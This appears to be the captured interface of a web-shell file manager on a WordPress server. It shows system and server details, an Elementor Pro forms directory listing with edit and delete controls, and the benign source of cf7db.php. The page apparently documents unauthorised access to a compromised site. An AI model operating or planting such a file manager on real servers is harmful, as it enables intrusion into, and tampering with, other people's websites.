[ SYSTEM ]: Linux wordpress 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
elementor-pro
/
modules
/
forms
/
actions
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 activecampaign.php
9,485 B
SET
[ EDIT ]
|
[ DEL ]
📄 activity-log.php
972 B
SET
[ EDIT ]
|
[ DEL ]
📄 cf7db.php
713 B
SET
[ EDIT ]
|
[ DEL ]
📄 convertkit.php
7,495 B
SET
[ EDIT ]
|
[ DEL ]
📄 discord.php
5,994 B
SET
[ EDIT ]
|
[ DEL ]
📄 drip.php
9,014 B
SET
[ EDIT ]
|
[ DEL ]
📄 email.php
16,146 B
SET
[ EDIT ]
|
[ DEL ]
📄 email2.php
1,051 B
SET
[ EDIT ]
|
[ DEL ]
📄 getresponse.php
9,004 B
SET
[ EDIT ]
|
[ DEL ]
📄 mailchimp.php
13,226 B
SET
[ EDIT ]
|
[ DEL ]
📄 mailerlite.php
8,129 B
SET
[ EDIT ]
|
[ DEL ]
📄 mailpoet.php
2,982 B
SET
[ EDIT ]
|
[ DEL ]
📄 mailpoet3.php
3,576 B
SET
[ EDIT ]
|
[ DEL ]
📄 redirect.php
1,833 B
SET
[ EDIT ]
|
[ DEL ]
📄 slack.php
6,213 B
SET
[ EDIT ]
|
[ DEL ]
📄 webhook.php
3,198 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: cf7db.php
<?php namespace ElementorPro\Modules\Forms\Actions; use ElementorPro\Modules\Forms\Classes\Action_Base; if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly } class CF7DB extends Action_Base { public function get_name() { return 'cf7db'; } public function get_label() { return 'Contact Form to Database'; } public function register_settings_section( $widget ) {} public function on_export( $element ) {} public function run( $record, $ajax_handler ) { $data = (object) [ 'title' => $record->get_form_settings( 'form_name' ), 'posted_data' => $record->get_formatted_data( true ), ]; // Call hook to submit data do_action_ref_array( 'cfdb_submit', [ $data ] ); } }